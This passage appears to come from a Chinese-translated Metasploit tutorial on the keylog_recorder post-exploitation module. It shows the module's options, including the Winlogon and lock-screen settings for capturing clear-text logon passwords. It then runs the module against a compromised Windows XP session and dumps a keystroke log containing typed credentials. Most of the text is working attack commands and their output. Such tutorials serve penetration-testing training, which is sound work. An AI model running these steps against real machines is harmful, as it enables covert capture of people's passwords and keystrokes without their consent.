keylog_recorder
该“keylog_recorder”模块捕捉入侵的系统上的按键。请注意,您需要确保在捕获击键之前您已经迁移到交互式进程。
meterpreter >
Background session 1? [y/N] y
msf > use post/windows/capture/keylog_recorder
msf post(keylog_recorder) > info
Name: Windows Capture Keystroke Recorder
Module: post/windows/capture/keylog_recorder
Platform: Windows
Arch:
Rank: Normal
Provided by:
Carlos Perez
Josh Hale
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CAPTURE_TYPE explorer no Capture keystrokes for Explorer, Winlogon or PID (Accepted: explorer, winlogon, pid)
INTERVAL 5 no Time interval to save keystrokes in seconds
LOCKSCREEN false no Lock system screen.
MIGRATE false no Perform Migration.
PID no Process ID to migrate to
SESSION yes The session to run this module on.
Description:
This module can be used to capture keystrokes. To capture keystrokes
when the session is running as SYSTEM, the MIGRATE option must be
enabled and the CAPTURE_TYPE option should be set to one of
Explorer, Winlogon, or a specific PID. To capture the keystrokes of
the interactive user, the Explorer option should be used with
MIGRATE enabled. Keep in mind that this will demote this session to
the user's privileges, so it makes sense to create a separate
session for this task. The Winlogon option will capture the username
and password entered into the logon and unlock dialog. The
LOCKSCREEN option can be combined with the Winlogon CAPTURE_TYPE to
for the user to enter their clear-text password. It is recommended
to run this module as a job, otherwise it will tie up your framework
user interface.
msf post(keylog_recorder) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20110421120355_default_192.168.1.195_host.windows.key_328113.txt
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Interrupt
[*] Stopping keystroke sniffer...
meterpreter >
在完成嗅探击键之后,或者甚至在嗅探器仍在运行时,我们可以转储捕获的数据。
root@kali:~# cat /root/.msf4/loot/20110421120355_default_192.168.1.195_host.windows.key_328113.txt
Keystroke log started at Thu Apr 21 12:03:55 -0600 2011
root s3cr3t
ftp ftp.micro
soft.com anonymous anon@ano
n.com e quit
root@kali:~#
</pre